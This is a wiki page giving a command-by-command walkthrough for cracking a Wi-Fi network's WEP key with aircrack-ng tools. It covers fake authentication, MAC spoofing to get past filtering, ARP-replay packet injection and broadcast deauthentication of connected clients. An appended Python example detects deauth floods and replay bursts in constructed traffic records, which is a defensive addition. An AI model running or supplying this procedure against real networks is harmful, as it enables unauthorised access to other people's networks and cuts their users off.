Cracking WEP

From LinuxWindowsWiki

List adapters:


Set the card in monitor mode:

airmon-ng start wlan0

Find AP:

airodump-ng mon0

Lock airodump-ng onto the AP's channel:

airodump-ng --channel 6 mon0

Leave it running, open a new terminal, and perform a fake authentication:

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0

If it fails, MAC filtering is on. In that case, try using the MAC of one of the clients associated with the AP (here 00:11:22:33:44:55):

airmon-ng stop mon0
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airmon-ng start wlan0

Try fake auth again:

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0

Stop airodump-ng and run it again, writing the captured IVs to a file:

airodump-ng -c 6 -w ~/testEssid -i mon0

Launch aireplay-ng in injection mode:

aireplay-ng -3 -b 00:14:BF:11:22:33 mon0

Leave it running. To speed things up, send a broadcast deauth:

aireplay-ng --deauth 0 -a 00:14:BF:11:22:33 mon0


Run aircrack-ng on the captured IVs to recover the key:

aircrack-ng -0 -b 00:14:BF:11:22:33 ~/testEssid-01.ivs
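
Seen from the monitoring side, the injection and broadcast deauth steps above leave a recognisable traffic pattern: many same-length broadcast data frames from one station, and a burst of broadcast deauth frames for one BSSID. The following Python detector is an added example, not part of the original wiki page; the record format, thresholds and alert names are assumptions, and the sample frames are constructed.

```python
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_PER_SEC = 10   # assumed threshold, tune for the site
REPLAY_PER_SEC = 100  # assumed threshold, tune for the site

def detect(records):
    """records: (time_s, kind, src, dst, bssid, length) tuples (constructed format).
    Returns a sorted list of (second, bssid, alert_name)."""
    deauth, replay = Counter(), Counter()
    for t, kind, src, dst, bssid, length in records:
        sec = int(t)
        if kind == "deauth" and dst == BROADCAST:
            deauth[(sec, bssid)] += 1
        elif kind == "data" and dst == BROADCAST:
            # A replayed frame repeats with the same source and length.
            replay[(sec, bssid, src, length)] += 1
    alerts = set()
    for (sec, bssid), n in deauth.items():
        if n >= DEAUTH_PER_SEC:
            alerts.add((sec, bssid, "broadcast-deauth-flood"))
    for (sec, bssid, _src, _length), n in replay.items():
        if n >= REPLAY_PER_SEC:
            alerts.add((sec, bssid, "arp-replay-suspected"))
    return sorted(alerts)

def sample_records():
    """Constructed sample: one quiet second, then a replay burst, then a deauth burst."""
    ap, sta = "00:14:BF:11:22:33", "00:11:22:33:44:55"
    recs = [(0.1 * i, "data", sta, ap, ap, 200 + i) for i in range(5)]
    recs.append((0.5, "deauth", ap, sta, ap, 26))  # single unicast deauth: normal
    recs += [(1 + i / 500, "data", sta, BROADCAST, ap, 68) for i in range(300)]
    recs += [(2 + i / 100, "deauth", ap, BROADCAST, ap, 26) for i in range(50)]
    return recs

if __name__ == "__main__":
    for alert in detect(sample_records()):
        print(alert)
```
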

This page was last modified on 8 April 2010, at 14:28.